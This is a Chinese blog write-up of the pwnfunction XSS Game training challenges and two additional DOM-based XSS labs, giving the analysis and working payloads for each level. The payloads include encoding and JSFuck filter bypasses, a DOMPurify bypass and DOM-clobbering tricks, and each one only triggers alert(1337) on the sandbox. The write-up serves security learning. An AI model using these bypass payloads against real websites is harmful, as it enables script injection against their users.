XSS漏洞复现(包括xssgame和三个高级xss漏洞)

已于 2024-08-17 23:32:50 修改
阅读量915 收藏 19
点赞数 12
文章标签: xss 前端
于 2024-08-17 23:29:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63890458/article/details/141285996
版权

文章目录

XSS GAME

地址:https://xss.pwnfunction.com/
在这里插入图片描述
关卡难度层层递进,各个漏洞都有特点,值得学习。实在解答不出来也有解答步骤,可依据作者解答思路进行理解。
接下来我们开始解题吧。

1、Ma Spaghet!


1)了解题目要求,需要无互动弹窗1337,不能使用不规范传参,over。
2)get请求传入‘somebody’参数,与‘Toucha Ma Spaghet!’拼接输出到h2中。
3)用innerHTML进行过滤,对script进行限制。
4)这样我们可以使用img标签进行绕过,Let’s Go!
代码如下:

https://sandbox.pwnfunction.com/warmups/ma-spaghet.html?somebody=<img src=1 onerror=alert(1337)>

img属性onerror:当src属性地址不存在时执行onerror属性里的代码。
在这里插入图片描述

2、Jefff

在这里插入图片描述
1)要求与第一题一致
2)分析代码:get请求传入jeff参数,用eval函数接收,我们知道,JS里的eval函数与PHP里的效果一致,都会把eval里的代码执行,即将‘Ma name $jeff’ 赋值给ma
3)setTimeout定时将ma里的代码进行innerText文本输出,我们可以在ma里进行闭合,逃出innerText范围,在setTimeout执行逃出的代码。
代码如下:

https://sandbox.pwnfunction.com/warmups/jefff.html?jeff=";alert(1377);"
https://sandbox.pwnfunction.com/warmups/jefff.html?jeff=";alert(1377)//

https://sandbox.pwnfunction.com/warmups/jefff.html?jeff="-alert(1337)-"
// 在js中-两边都是表达式,则可以执行代码

在这里插入图片描述

3、Ugandan Knuckles

在这里插入图片描述
1)分析代码:发现replace用空替换全局的[、<、>、]符号,然后把wey放到了input标签里
2)不能直接传如<>,就要考虑能不能闭合。
3)input标签里的属性能使用js代码的有herf用伪协议herf=javascript:alert(1),还有οnfοcus=alert(1337),但是这两个属性都需要用户交互,不满足题目要求,所以需要autofocus=去自动聚焦。
代码如下:

https://sandbox.pwnfunction.com/warmups/da-wey.html?wey=aaa" onfocus=alert(1337)"autofocus="

在这里插入图片描述

4、Ricardo Milos

在这里插入图片描述
1)分析代码:setTimeout 2秒后submit提交页面以action 方式提交。
2)action有伪协议事件,action=javascript:alert(1)
代码如下:

https://sandbox.pwnfunction.com/warmups/ricardo.html?ricardo=javascript:alert(1337)

在这里插入图片描述

5、Ah That’s Hawt

在这里插入图片描述
1)分析代码:过滤了(、)、',过滤了()就不能直接alert()了
2)考虑编码绕过,首先我们要知道编码顺序:urlcode–>实体编码–>unicode
代码如下:

https://sandbox.pwnfunction.com/warmups/thats-hawt.html?markassbrownlee=%3Cimg%20src=1%20onerror=location=%22javascript:alert%25281337%2529%22%3E

https://sandbox.pwnfunction.com/warmups/thats-hawt.html?markassbrownlee=%3Csvg%20onload%3D%22%26%23x61%3B%26%23x6C%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x31%3B%26%23x33%3B%26%23x33%3B%26%23x37%3B%26%23x29%3B%22%3E

在这里插入图片描述

6、Ligma

在这里插入图片描述
1)分析代码:过滤英文大小写和数字
2)没有限制字符长度,我们可以用jsfuck.com网址,将alert(1337)转成字符串再传入。
3)如果不行,再进行urlcode编码
在这里插入图片描述

代码如下:

编码前:
[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])

编码后:
%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D((!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%2B%5B!%5B%5D%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(%2B(!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D))%5B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%2B%5B%5D)%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%5B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B((%2B%5B%5D)%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%2B%5B%2B!%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%5D(!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%5D)%2B(!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D)()((!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D%2B%5B%2B!%2B%5B%5D%5D%2B(%5B%2B%5B%5D%5D%2B!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D)

在这里插入图片描述

7、Mafia

在这里插入图片描述
1)分析代码:限制字符长度0-50,过滤‘、“、+、alter等
2)想办法绕过,首先我们知道,弹窗最常用的三个函数,为alert、prompt、confirm,三个函数都能实现弹窗,而题目只过滤了,那就太简单了,如果就用alert来绕过,又如何做到呢?
3)Function匿名函数。parseInt将字符转进制,然后用toString复原来绕过。有个细节就是parseint转的尽量大,然后以同样进制转字符,不然转不全,最大36.
代码如下:

Function:
https://sandbox.pwnfunction.com/warmups/mafia.html?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

parseint:
parseInt("alert",32) 		//将'alert'看作32进制数,返回十进制数11189117
11189117..toString(32)
https://sandbox.pwnfunction.com/warmups/mafia.html?mafia=eval((11189117..toString(32)))(1337)

官方:
https://sandbox.pwnfunction.com/warmups/mafia.html?mafia=eval(location.hash.slice(1))#alert(1337)

在这里插入图片描述
在这里插入图片描述

8、Ok, Boomer

在这里插入图片描述
1)分析代码:DOMPurify看到这个过滤,基本可以放弃在这个地方进行注入,看setTimeout(ok,2000)
2)我们可以伪造一个ok,然后利用setTimeout执行我们的代码,而刚好setTimeout拿到ok时,会自动调用toString方法去执行我们标签后面的属性。
3)javascript被DOMPurify过滤。去githup看DOMPurify的白名单,发现tel/cid都可以,我们用tel。
代码如下:

https://sandbox.pwnfunction.com/warmups/ok-boomer.html?boomer=%3Ca%20id=ok%20href=tel:alert(1337)%3E

在这里插入图片描述

全删除属性dom破坏

代码环境如下:

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="author" content="system">
    <meta name="keywords" content="whoami">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>
        <script>alert(1)</script>
    </title>
</head>
<body>
</body>
<script>
    const data = decodeURIComponent(location.hash.substr(1))
    const root = document.createElement('div')
    root.innerHTML = data
    // console.log(root.querySelectorAll('*'))

    for (let el of root.querySelectorAll('*')) {
        let attrs = [];
        for (let attr of el.attributes) {
            attrs.push(attr.name)
        }
        for (let name of attrs) {
            el.removeAttribute(name);
        }
    }
    document.body.appendChild(root);
</script>

</html>

1)代码分析:删除了div标签下所有子标签的所有属性,怎么使得我们注入代码不被删掉,或者在删掉之前就让他执行。

用两个input标签的属性id=atrributes占用两个循环,导致from标签的属性没有被删除,利用动画执行js代码。
payload1:

<style>@keyframes x{}</style><form style="animation-name: x" onanimationstart="alert(1)"><input id=attributes><input id=attributes>

在这里插入图片描述
在这里插入图片描述

利用chrome v8引擎的底层运行模式,在加载完而没删除属性前就执行代码。
payload2:

<svg><svg onload="alert(1)"></svg>

在浏览器解析和加载页面时,事件处理程序(如 onload)在元素被完全解析并添加到 DOM 树中时会立即触发并执行。这种机制确保了即使在删除元素之前,相关事件处理程序也能够被执行。这种行为是浏览器渲染引擎和 JavaScript 引擎(如 V8 引擎)协同工作的结果。

对于 <svg><svg> onload="alert(1)"> 这个代码片段,流程如下:
①解析外层 <svg> 元素:浏览器开始解析外层 <svg> 元素,并创建相应的 DOM 节点。
②解析内层 <svg> 元素:浏览器继续解析内层 <svg> 元素,注意到 onload 属性,并将 alert(1) 作为加载事件的处理程序。
③触发 onload 事件:由于内层 <svg> 元素已经被解析并添加到 DOM 树中,浏览器认为该元素已经加载完成,因此触发 onload 事件。
④执行 alert(1):V8 引擎执行 onload 事件处理程序中的代码,即 alert(1)。

在这里插入图片描述

WW3

代码环境:

<div>
    <h4>Meme Code</h4>
    <textarea class="form-control" id="meme-code" rows="4"></textarea>
    <div id="notify"></div>
</div>

<script>
    /* Utils */
    const escape = (dirty) => unescape(dirty).replace(/[<>'"=]/g, '');
    const memeTemplate = (img, text) => {
        return (`<style>@import url('https://fonts.googleapis.com/css?family=Oswald:700&display=swap');`+
            `.meme-card{margin:0 auto;width:300px}.meme-card>img{width:300px}`+
            `.meme-card>h1{text-align:center;color:#fff;background:black;margin-top:-5px;`+
            `position:relative;font-family:Oswald,sans-serif;font-weight:700}</style>`+
            `<div class="meme-card"><img src="${img}"><h1>${text}</h1></div>`)
    }
    const memeGen = (that, notify) => {
        if (text && img) {
            template = memeTemplate(img, text)

            if (notify) {
                html = (`<div class="alert alert-warning" role="alert"><b>Meme</b> created from ${DOMPurify.sanitize(text)}</div>`)
            }

            setTimeout(_ => {
                $('#status').remove()
                notify ? ($('#notify').html(html)) : ''
                $('#meme-code').text(template)
            }, 1000)
        }
    }
</script>

<script>
    /* Main */
    let notify = false;
    let text = new URL(location).searchParams.get('text')
    let img = new URL(location).searchParams.get('img')
    if (text && img) {
        document.write(
            `<div class="alert alert-primary" role="alert" id="status">`+
            `<img class="circle" src="${escape(img)}" onload="memeGen(this, notify)">`+
            `Creating meme... (${DOMPurify.sanitize(text)})</div>`
        )
    } else {
        $('#meme-code').text(memeTemplate('https://i.imgur.com/PdbDexI.jpg', 'When you get that WW3 draft letter'))
    }
</script>

1)代码分析,DOMPurify和textarea出现的地方先不考虑,反复分析只有setTimeout处,将notify判断为真才有注入机会
2)Jquery.html()可以逃脱标签,<style><style/><script>alert(1337)//
3)img加载异步
payload:

https://sandbox.pwnfunction.com/challenges/ww3.html?text=%3Cimg%20name%3dnotify%3E%3Cstyle%3E%3Cstyle%2F%3E%3Cscript%3Ealert(1337)%2F%2F&img=https://i.imgur.com/PdbDexI.jpg

过程:
1、先执行text
2、执行,使notify为真
3、逃逸script到div标签里
4、执行alert(1337)
在这里插入图片描述

Vanilla-li
关注
XSS漏洞复现(CVE-2017-12794)
m0_56578216的博客
08-30 432
前提条件:1.
XSS漏洞总结和漏洞复现
weixin_45492087的博客
07-28 2370
跨站脚本攻击XSS(CrossSiteScripting),为区别层叠样式表(CascadingStyleSheets,CSS),所以改写为XSS
XSS漏洞复现
qq_52016943的博客
07-27 1403
XSS绕过
xss漏洞复现
h2896713787的博客
11-10 5321
xss
复现XSS漏洞及分析
qq_61739597的博客
09-01 3081
跨站脚本攻击XSS(Cross Site Scripting),为区别层叠样式表(Cascading Style Sheets, CSS),所以改写为XSS
XSS漏洞复现
qq_39744805的博客
09-01 1247
跨站脚本( Cross-site Scripting )攻击,攻击者通过网站输入框输入payload(脚本代码 ),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的( 窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML语言中的CSS相混淆,通常称它为“XSS”。
漏洞复现--xss
weixin_52351575的博客
01-11 861
切换至Attack机,即我们的攻击机,然后来到火狐浏览器,即攻击方,当受害者用户点击“XSS(Stored)”之后,XSS平台会有一条消息,刷新,查看“接受面板”,发现多了一个数据,这就是我们受害者用户的一个数据,在这里面我们可以看到受害者的cookie,如下图。选择公共模板,在“default.js”下,修改模板,将“http://网站地址”修改为“http://10.1.1.200/xss/index.php”,修改完成之后点击“修改”,如下图。
pikachu之xss漏洞复现
m0_54024658的博客
05-24 712
xss跨站脚本xss简介xss漏洞类型反射型存储型DOM型XSS攻击过程漏洞复现反射型XSS(get)存储型XSSDOM型XSS xss简介 XSS(跨站脚本)是一种发生在Web前端漏洞,所以其危害的对象也主要是前端用户,XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制。因为对程序中输入和输出的控制不够严格,导致漏洞的形成。 xss漏洞类型 反射型 交互的数据一般不会被存在数据库里面,一次性,所见即所得,一般出现在查询页面等 存储型 交互的数据会被存在数据库里面,
Heybbs-2.0存储型XSS漏洞复现
1匹黑马
01-27 747
文章目录前言代码审计漏洞验证临时修复 前言 这个漏洞的成因主要是因为程序对用户的输入没有进行过滤而导致的 代码审计 漏洞出现在注册页面上,这里因为没有进行过滤,所以我们可以直接注册一个XSS语句,且每次访问index.php页面都会执行这个语句。 先来看一下/php/register.php的代码吧 可以看到,POST过来的username直接就赋值给了$username,下面的sql语句也是直接拼接进去的,连个单引号都没加 这个bbs系统怎么说呢,但凡有数据交互的地方,就有利用点… 漏洞验证 首先注
XSS复现
最新发布
nixiaoge的博客
08-18 942
XSS是一种网络安全漏洞,允许攻击者通过注入恶意脚本到网页中,影响用户。主要类型包括反射型XSS、DOM型XSS和CSS型XSS。防范措施包括输入验证、转义用户输入和使用HttpOnlyCookie。文章详细解释了各种XSS攻击的原理和防范方法。
存储型XSS_简单漏洞复现
CHUNJIUJUN的博客
08-10 425
首先随便注册一个账号登录 写一篇邮件,邮件内容插入xss语句 burpsuit抓包,发送到repeater,放包,发现script被过滤了 所以改包改用<img src=1 onpointerout=alert(123)> 这里我们去看看我们发布的内容是否双击以后有弹窗 弹窗出现,说明有xss漏洞 ...
xss反射型漏洞复现
weixin_53284312的博客
11-10 1157
xss反射型漏洞复现
XMind漏洞xss复现(最全payload图文教程)
weixin_51387754的博客
05-18 413
